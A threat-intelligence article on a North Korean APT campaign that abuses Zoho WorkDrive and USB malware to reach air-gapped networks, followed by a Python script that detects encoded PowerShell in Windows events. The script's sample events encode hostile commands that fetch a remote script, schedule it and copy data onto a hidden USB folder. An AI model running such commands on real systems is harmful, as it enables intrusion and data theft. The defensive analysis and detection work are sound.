ScarCruft exploits Zoho WorkDrive and USB malware for air-gap attacks
Introduction: A new advanced campaign by the ScarCruft group
The North Korean APT group known as ScarCruft, or APT37, launched one of the most complex and well-orchestrated cyber campaigns observed to date in 2026. By combining exploitation of the Zoho WorkDrive platform with USB-borne malware specifically designed to infect air-gapped systems, the threat actors have once again demonstrated a high level of expertise and perseverance in their digital espionage operations.
This offensive is notable for the sophisticated way it attacks different segments of the digital chain, compromising both internet-connected environments and physically isolated infrastructures. The main goal is to collect sensitive information, including strategic documents, project files, internal communications and critical operational data of the targeted victims.
Initial infection mechanism via Zoho WorkDrive
ScarCruft abused the Zoho WorkDrive ecosystem to deliver malicious files disguised as legitimate documents. Using advanced social engineering techniques, the attackers send links to files uploaded to WorkDrive, exploiting companies' trust in this collaborative platform. Victims open the documents without suspecting that they contain malicious macros, PowerShell scripts or zero-day exploits capable of initiating the installation of an entire malware infrastructure.
This method allows for efficient distribution and is difficult to detect, as traffic to WorkDrive is often considered benign by security solutions. The attack is a clear example of how cloud service providers can be exploited to bypass traditional defense mechanisms.
Secondary vector: infection of air-gap systems via USB
One of the most notable components of the ScarCruft campaign is the use of multi-stage USB malware specifically designed to compromise air-gapped systems, that is, systems completely isolated from any internet connection. In the later stages of a compromise, the attackers deploy a dedicated module capable of automatically copying itself onto USB sticks connected to the infected systems.
Once the stick is inserted into a computer in an air-gap environment, the malware silently activates, collects files of interest, and saves them to a hidden location. Later, when the USB device is reconnected to a compromised system connected to the internet, the data is automatically exfiltrated to command and control servers. This technique allows attackers to bypass one of the strongest physical security measures used by organizations.
Technical framework: malware components used
Kaspersky and MSTIC analysis showed that ScarCruft uses a modular malware ecosystem, tailored to each stage of the attack. Among the identified components are:
- an initial dropper based on obfuscated PowerShell scripts;
- a keylogger with extensive telemetry and clipboard-monitoring functionality;
- a stealth module for exfiltrating data through legitimate channels;
- polymorphic USB malware capable of modifying itself to evade detection;
- persistence scripts integrated into the Task Scheduler and the registry.
This modular framework allows the attackers to install only the components they need, reducing the risk of detection and maintaining a discreet profile in the victim's network. Each module is cryptographically signed or masked under a legitimate identity, making forensic analysis difficult.
Zoho WorkDrive Exploitation: A Stealthy Infiltration Model
For infiltration through Zoho WorkDrive, ScarCruft uploads files with dual behavior: on the outside they appear to be unimportant documents, but inside they hide encoded sequences that trigger the download of a secondary payload. Because the traffic sits in the cloud infrastructure of a company with a strong reputation, security solutions let these files through without raising an alert.
In addition to this technique, the attackers use encoded command-chaining mechanisms that allow them to run PowerShell commands directly from WorkDrive files without raising suspicion. The result is a high level of persistence, combined with an operational latency that makes the campaign difficult to identify until it has already compromised critical segments of the victim's infrastructure.
The geopolitical objectives and rationale of the ScarCruft group
ScarCruft is known for its focus on geopolitical espionage, with a particular interest in industries such as defense, advanced research, nuclear energy, telecommunications, and government institutions. In the current campaign, stated targets include organizations in Southeast Asia, Central Europe, Australia, and the United States.
The group focuses on acquiring strategic information that can support the interests of the North Korean state, whether in diplomatic negotiations or in the development of its domestic programs. By combining cloud compromise with advanced air-gap infiltration techniques, ScarCruft demonstrates a rare technical maturity, characteristic of state actors with vast resources.
Details on how to exfiltrate data
One of the most innovative parts of this campaign is how the information is exfiltrated. Instead of using obscure channels or custom C2 infrastructures, ScarCruft relies on:
- proxy servers hosted in third countries;
- encrypted channels integrated into legitimate cloud services;
- incremental file transfer to reduce visibility;
- fragmenting data so it can be sent in small segments.
This strategy significantly reduces the chance that an anomaly-based detection system will notice unusual activity. The attackers also implement self-destruct mechanisms for components left behind after exfiltration, eliminating traces that could help forensic analysts.
Infection scenario for air-gap systems
A typical scenario presented by researchers looks like this: an employee downloads a compromised document on a system connected to the internet. Unbeknownst to them, it installs a stealth agent that monitors USB connections. When the employee inserts a USB stick that is also used in the air-gapped environment, the agent automatically copies the malware onto the device, into a hidden and obfuscated section.
When the stick is moved into an air-gapped system, the payload activates, scans the entire machine for sensitive documents and stores them in an encrypted container. Upon reinsertion into a compromised system connected to the internet, the data is silently exfiltrated.
The reasons why the attack is so effective
The effectiveness of this campaign comes from three key elements:
- Exploiting trust in legitimate cloud services such as Zoho.
- The ability to compromise air-gapped systems, traditionally considered very secure.
- The modularity of the malware, adaptable to any type of infrastructure.
These elements make ScarCruft an example of an advanced actor that understands not only the technology, but also the organizational and human behavior of its victims.
Recommended measures for organizations
Specialists recommend a series of essential measures to prevent such attacks:
- Rigorous analysis of files uploaded to cloud platforms, including those from trusted sources.
- Restrictions and advanced monitoring for the use of USB devices.
- Strong network segmentation and active isolation of sensitive systems.
- Deployment of EDR and XDR solutions with behavioral analysis capabilities.
- Advanced training for employees on social engineering attacks.
Adopting these measures can substantially reduce the risk of a ScarCruft attack succeeding, but the reality remains that APT actors will constantly adapt their techniques to overcome defensive mechanisms.
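The behavioral telemetry these measures call for, as an added example that is not from the article or from the vendors it cites: it decodes PowerShell -EncodedCommand arguments in constructed, simplified Windows Security events (4688 process creation, 4698 scheduled task created, 6416 new external device recognized) and flags the three patterns described earlier, namely encoded fetches from WorkDrive, encoded scheduled-task actions, and encoded commands touching a just-inserted removable drive. The event shape, the URL host, the paths and the drive letter are assumptions made for the example.

```python
import base64
import re
from datetime import datetime, timedelta

# Common spellings of PowerShell's -EncodedCommand switch, then its base64 argument.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_ps(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events, window=timedelta(minutes=5)):
    """Return (ts, rule) pairs for time-ordered events shaped like SAMPLE_EVENTS."""
    findings, last_usb = [], None  # last_usb: (time, drive letter) of the latest 6416
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 6416:  # new external device recognized
            last_usb = (ts, ev["drive"].lower())
            continue
        decoded = decode_encoded_ps(ev.get("cmd", ""))
        if decoded is None:
            continue  # plain command lines are left to other rules
        text = decoded.lower()
        if "workdrive" in text:  # encoded fetch from the collaboration platform
            findings.append((ev["ts"], "encoded-ps-workdrive-fetch"))
        if ev["id"] == 4698:  # scheduled task created with an encoded action
            findings.append((ev["ts"], "scheduled-task-encoded-ps"))
        if last_usb and ts - last_usb[0] <= window and last_usb[1] in text:
            findings.append((ev["ts"], "encoded-ps-touches-new-usb"))
    return findings

def enc(script):  # encode as -EncodedCommand expects: UTF-16LE, then base64
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample events (not from the article); URL, paths and drive letter are invented.
SAMPLE_EVENTS = [
    {"ts": "2026-03-01T09:00:00", "id": 4688, "cmd": "powershell.exe -nop -w hidden -enc "
     + enc("iwr https://workdrive.example/f/1 -OutFile $env:TEMP\\a.ps1")},
    {"ts": "2026-03-01T09:00:05", "id": 4698, "cmd": "powershell.exe -ec " + enc("& $env:TEMP\\a.ps1")},
    {"ts": "2026-03-01T09:20:00", "id": 4688, "cmd": "powershell.exe -File deploy.ps1"},
    {"ts": "2026-03-01T10:00:00", "id": 6416, "drive": "E:"},
    {"ts": "2026-03-01T10:01:30", "id": 4688, "cmd": "powershell.exe -e "
     + enc("copy $env:TEMP\\u.dat E:\\.sys\\u.dat -Force")},
]
```

Running `triage(SAMPLE_EVENTS)` yields one finding per malicious event and none for the plain `-File` invocation; in production the 4698 task action would be extracted from the event's XML rather than handed over as a ready-made command line.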
Conclusion
The 2026 ScarCruft campaign marks a significant evolution in APT techniques geared towards geopolitical espionage. The Zoho WorkDrive platform exploitation combined with the ability to compromise air-gap systems via USB malware represents a quantum leap, demonstrating that the traditional boundaries between connected and isolated environments are no longer a real barrier for well-prepared actors.
As organizations continue to rely on cloud ecosystems and mixed infrastructures, campaigns of this type are likely to become more common. Rigorous assessment of the digital chain, increased cyber maturity, and investment in adaptive security are becoming imperative to prevent such critical incidents.